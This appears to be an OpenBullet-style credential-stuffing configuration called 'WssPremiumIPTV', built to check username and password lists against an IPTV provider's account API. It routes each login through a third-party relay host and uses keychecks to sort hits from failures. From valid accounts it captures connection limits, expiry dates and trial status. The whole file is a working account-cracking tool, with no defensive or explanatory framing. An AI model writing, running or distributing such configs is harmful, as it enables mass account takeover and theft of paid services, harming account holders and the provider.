[SETTINGS]
{
  "Name": "WssPremiumIPTV",
  "SuggestedBots": 5,
  "LastModified": "2018-07-29T12:46:41.1543147+00:00",
  "AdditionalInfo": "",
  "Author": "Paparazzi-Nicolas",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#URL REQUEST GET "http://mikkm.xyz/android/androidApi.php?mode=user_info&url=http://iptv.wssiptv.com:80/&username=<USER>&password=<PASS>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Plex-Client-Identifier: 9f6e14d4-27c8-f593-77d7-18bb8db6257a" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"auth\":0" 
    KEY "ACCESS DENIED! AndroidAPI v3.1" 
  KEYCHAIN Success OR 
    KEY "status\":" 
#CONNECTIONS PARSE "<SOURCE>" LR "\"max_connections\":\"" "\"" Recursive=FALSE -> CAP "CONNECTIONS" "" "" 
#EXPIRE PARSE "<SOURCE>" LR "\",\"exp_date\":\"" "\"" Recursive=FALSE -> VAR "EXPIRE" "" "" 
FUNCTION UnixTimeToDate "<EXPIRE>" -> CAP "EXPIRE" 
#TRIAL PARSE "<SOURCE>" LR "\",\"is_trial\":\"" "\"" Recursive=FALSE -> CAP "TRIAL" "" "" 
